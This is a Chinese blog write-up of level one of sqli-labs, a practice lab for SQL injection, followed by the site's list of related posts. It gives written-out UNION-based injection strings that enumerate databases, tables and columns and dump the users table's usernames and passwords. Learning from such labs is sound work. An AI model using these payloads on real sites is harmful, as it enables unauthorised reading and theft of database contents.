sqli-labs系列——第一关

最新推荐文章于 2024-07-24 16:26:59 发布
最新推荐文章于 2024-07-24 16:26:59 发布
阅读量2.1k 收藏 3
点赞数 1
分类专栏: sqli-labs 文章标签: SQL注入 Web渗透 sqli-labs 数据库探测 信息获取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51923959/article/details/112667476
版权

php学习告一段落,接下来的时间就是web渗透的练习了,先看了一遍关于sql的一些知识点,通关sqli-labs加深下印象。之前也因为作业的原因通关过前10关,但那时候不懂得原理,跟着网上的教程做的,所以这次尝试自己思考通关。

less1

尝试and1=2,不为数值注入
在这里插入图片描述

加单引号报错,判断为单引号字符注入

在这里插入图片描述

判断表有几行数据,order by 4–+时报错
在这里插入图片描述

用union联合查询有无显示位

在这里插入图片描述

查询数据库名

?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

在这里插入图片描述

查询表名

?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述

查询user的列名

?id=1' AND 1=2 union (select group_concat(column_name) from information_schema.columns where table_name='users'--+

在这里插入图片描述

查询用户名跟密码

?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+

在这里插入图片描述

Drunkmars
关注
专栏目录
sqli-labs第一关
weixin_69147946的博客
11-11 524
sqli-labs靶机笔记
sqli-labs第一关的闯关
qq_45154529的博客
01-05 2112
第一关:单引号错误 SQL的注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
sqli-labs--第一关
wyzhxhn的博客
11-05 480
sqli-labs靶场第一关
Sqli-labs第一关
最新发布
yyf985211的博客
07-24 335
id=-1' union select 1,2,3 # 我们让id等于-1是因为它在表中是不存在的,所以不会执行且显示出来,直接执行我们后面的语句,这样我们就知道了2,3是可以用的,那么接下来我们就要查询它目前所在的库,(mySQL的版本号也可以查询,有些时候会用到这些漏洞,这里暂时用不上)根据提示,它要我们输入ID作为数值参数,另外这是通过URL的GET类型注入,所以我们先输入?这样我们就得到了它的一个正常的回显,那我们就开始尝试字符型注入,比如单引号,双引号等等。
sqli_labs第一关
qq726232111的博客
08-11 1688
小萌新入坑,从sqli-labs开始搞起 Less-1 提示:测试时要使用英文模式下字符!!!!!!要仔细查看是否字符有误导致无法返回信息!!!!! 0x0 信息分析 搭建好环境后来到Less-1的页面查看页面提示信息并分析 此时可以看到给出的提示信息 Please input the ID as parameter with numeric value 翻译 请输入ID作为...
sqlilabs第一关懵逼小解答
zlloveyouforever的博客
03-13 4964
sqlilabs第一关新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1409
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1840
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs系列——第五关(二次查询注入)
1匹黑马
04-26 7013
文章目录判断注入什么是二次查询注入rand()函数floor()函数concat()函数group by语句count()函数开始注入exp 判断注入 一开始我以为这是一个常规的sql盲注,操作之后发现事情并没有那么简单,为了方便学习,我直接把sql语句输出出来了: 然后就去看题目名称,Double Injection(双查询注入),就明白怎么回事了。 什么是二次查询注入 双查询注入其实就是一个...
sqli-labs系列——第六关(双引号二次查询注入)
1匹黑马
05-08 2209
文章目录判断注入开始注入 判断注入 先输一个单引号看看: 、 可以看到这里是采用的双引号闭合,那么我们就在后边让它跟一个双引号报错: 开始注入 第六关其实就是一个双引号的二次查询注入,这里就不做过多演示了,原理跟第五关一样,都是用了count()、floor()、rand()、group by语句来进行注入的。 这里直接上exp干了: http://192.168.1.113:86/Less-6/?id=1" union SELECT null,count(*),concat((select passw
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1503
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
渗透漏洞基础之sqli-labs第一关
lbg685的博客
02-20 544
渗透漏洞超级基础之sqli-labs第一关
SQLi-Labs SQL注入练习平台(第一关)
banyang6297的博客
01-18 358
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。-----百度百科   我用的是看...
sqli-labs靶场第一关
A_450的博客
12-12 1090
sqli-labs靶场第一关
sqli-labs第1关
weixin_45626840的博客
04-23 229
草草写的一篇记录文章 概念 SQL注入就是将恶意代码拼接到业务正常的数据库查询,造成数据库信息泄露等危害。 我觉得 要弄懂SQL注入,需要一点计网的知识,最好知道Web开发的整个流程,中间用了哪些技术,为什么需要这种技术。当然,你首先得懂得数据库以及SQL查询,并且程序设计语言和SQL语言之间的结合(推荐一本书《数据库系统概论》)。有了这些基础,SQL注入就自然而然会懂的。 通关思路 输入id,登录正常 尝试闭合语句 单引号报错,推测后端查询语句为: select * from table where
sqli-labs一第一关详细步骤,新手打基础篇
qq_50956249的博客
03-21 628
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
sqlilab第一关
qq_45491497的博客
07-28 2016
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值